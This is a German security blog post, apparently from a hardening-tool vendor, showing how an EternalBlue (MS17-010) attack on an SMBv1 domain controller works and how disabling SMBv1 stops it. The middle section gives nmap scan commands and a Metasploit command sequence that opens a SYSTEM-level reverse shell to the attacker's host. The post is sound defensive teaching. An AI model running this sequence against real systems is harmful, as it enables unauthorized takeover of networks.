SMBv1 ist unsicher – das ist schon seit 2014 bekannt. Trotzdem schlägt der Eternal Blue Exploit noch immer bei einigen Firmennetzwerken zu. Wir zeigen Ihnen, wie Sie verhindern können, dass Angreifer diese “populäre” Sicherheitslücke als Einfallstor verwenden.
Warum ist SMBv1 so gefährlich?
Das Server Message Block Protokoll in der Version 1 (kurz: SMBv1) gilt als veraltet, es läuft jedoch weiterhin auf vielen Systemen. Daher nutzen Angreifer gerne diese Schwachstelle aus. Mit dem berüchtigten Eternal Blue Exploit, von Microsoft als MS17-010 bezeichnet, können sich Hacker unberechtigt Zugang zu Systemen verschaffen – was unter anderem mit den WannaCry- und NotPetya-Cyberattacken weltweit gelang.
In diesem Leitfaden erfahren Sie, wie ein Angreifer die SMBv1-Schwachstelle ausnutzt, um in Systeme einzudringen. Außerdem bieten wir Ihnen eine einfache Lösung gegen den Eternal Blue Exploit.
Unsere Erklärungen haben wir auch in diesem Video zusammengefasst:
So läuft eine Eternal-Blue-Attacke ab
Stellen wir uns folgendes Szenario vor: Ein Angreifer hat Zugriff auf ein Unternehmensnetzwerk, jedoch keine weiteren Rechte. Sein Ziel ist es, eine Remote Shell mit administrativen Rechten auf einem ungehärteten Domain Controller (IP 10.10.99.10) zu öffnen.
Für sein Vorhaben verwendet er Kali Linux (IP 10.10.99.7). Das Betriebssystem, das für Sicherheitsexperten gedacht ist, kann auch von Black Hat Hackern “missbraucht” werden.
Der Angriff, bei dem die SMBv1-Lücke über Kali Linux ausgenutzt wird, gliedert sich in diese Phasen:
Phase 1: Untersuchung des Zielsystems
Der Angreifer startet eine Analyse mit dem Tool “nmap”, das zur Netzwerk- und Port-Analyse dient. Dafür reicht dieser Prompt aus:
nmap -v -Pn -sV 10.10.99.10
Das Ergebnis “enthüllt” geöffnete Ports – darunter Port 445, der für SMB verwendet wird. Der aktive Dienst “microsoft-ds” weist darauf hin, dass SMB in einer bestimmten Version verfügbar ist.
Der Angreifer sucht nun gezielt nach bekannten Schwachstellen mit folgender Eingabe:
nmap -v -Pn -p 445 –script smb-vuln-ms17-010 10.10.99.10
Das Skript offenbart, dass das Zielsystem verwundbar ist. Daher bekommt es den Status “vulnerable” und einen hohen Risikofaktor.
Phase 2: Durchführung des Angriffs
Im nächsten Schritt setzt der Angreifer auf Metasploit, ein Framework für Penetrationstester. Er tippt daher Folgendes nacheinander ein:
msfconsole
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 10.10.99.10
set LHOST 10.10.99.7
run
Es öffnet sich eine Meterpreter Shell. Mit dieser kann der Hacker das System fernsteuern. Über die Eingabe “whoami” stellt er fest, dass er die höchsten Rechte des Systems (“nt authority\system”) besitzt.
Anders gesagt: Der Angreifer erhielt eine Remote Shell mit administrativen Rechten. Das ist die ideale Ausgangslage, um weiter vorzudringen, Informationen zu stehlen, Daten zu verschlüsseln oder ganze Netzwerke lahmzulegen.
Was ist die Lösung? Eine Systemhärtung!
Um Attacken wie die eben beschriebenen im Keim zu ersticken, ist eine “Härtung” erforderlich. Deaktivieren Sie dazu SMBv1 und verwenden Sie sicherere Alternativen wie SMBv2 oder SMBv3. Das gelingt Ihnen mit diesem PowerShell-Befehl:
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -Remove
Danach ist ein Neustart erforderlich, um die Änderungen wirksam zu machen.
Was bringt die Härtung?
Wir spielen erneut das Szenario durch, indem wir exakt gleich vorgehen – allerdings auf einem gehärteten System. Die Ergebnisse sehen dieses Mal so aus:
✅ Der Scan liefert keine klare Bestätigung für den SMB-Dienst.
✅ Der “nmap”-Test auf Eternal-Blue-Schwachstellen liefert keine Vulnerability.
✅ Der Versuch, das Metasploit Exploit auszuführen, scheitert. Es wird keine Remote Shell geöffnet.
Fazit
Die Deaktivierung von SMBv1 hat den Angriff erfolgreich verhindert. Der “Cybergangster” konnte das System nicht mehr kompromittieren und somit ist MS17-010 bzw. der Eternal Blue Exploit wirkungslos. Dies zeigt eindrucksvoll, wie wichtig das Deaktivieren einzelner, unsicherer Dienste ist.
Machen Sie sich klar: Die SMBv1-Schwachstelle ist nur eine von vielen, die in IT-Systemen präventiv beseitigt werden sollten. Denn jede geschlossene Sicherheitslücke verringert die Angriffsfläche – und damit das Risiko, dass Systeme kompromittiert werden.
Daher müssen Sie auf eine ganzheitliche Sicherheitsstrategie setzen, um Ihre Systeme optimal zu schützen. Dazu gehört eine umfassende Secure Configuration bzw. Systemhärtung. Um effizient voranzukommen, sollten Sie ein professionelles Hardening-Tool wie den Enforce Administrator implementieren – besonders wenn Sie eine große, heterogene IT-Landschaft mit hunderten oder gar tausenden Systemen haben.
Wie können wir Ihnen helfen?
Wollen Sie mehr über Systemhärtung erfahren und praktische Tipps zur sicheren Konfiguration von Systemen erhalten? Folgen Sie uns auf LinkedIn!
Oder möchten Sie wissen, wie Sie eine (automatisierte) Systemhärtung professionell realisieren und in Ihrem Unternehmen implementieren können? Sprechen Sie uns an – unsere Experten sind gerne für Sie da!
Bild: Freepik